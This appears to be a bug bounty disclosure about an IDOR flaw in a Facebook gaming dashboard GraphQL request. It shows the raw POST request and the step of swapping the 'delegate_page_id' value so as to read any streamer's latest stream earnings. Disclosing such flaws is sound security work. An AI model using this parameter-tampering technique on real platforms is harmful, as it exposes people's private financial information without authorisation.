Published On: 25 Mar 2021
In Facebook gaming dashboard there is an option called "viewing stream report, where streamers can know some information about their stream like, Title, description, Tagged game etc, for more info see https://www.facebook.com/business/help/423354648152123?id=648321075955172
The Post request that handle that option is vulnerable to an IDOR bug in the parameter called "delegate_page_id", where it is possible to disclose the money amount for any latest live stream for any gaming streamer page.
This is will allow the attacker to disclose latest stream video asset earnings for any gaming streamer page.
Step
1
From attacker account
==================
1- Go to https://business.facebook.com/creatorstudio/home ==> Creative tools ===> Live dashboard
2- Go to Latest stream box option ==> Intercept with bupsuite ==> click on "View Stream Report"
you should see POST request like below:
POST /api/graphql/ HTTP/1.1
Host: business.facebook.com
av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910
The vulnerable parameter is "delegate_page_id", change the value of it to any streamer page, and forward the request to the server.
you will get a lot of information about the streamer page and one of them is the below private info:
- "latest_stream_video_asset_earnings":"money amount in number" for example as below:
"latest_stream_video_asset_earnings":"500.00"
which disclose the money amount of his latest stream video.
The above info, consider as private and should not be visible by anyone except the page admins.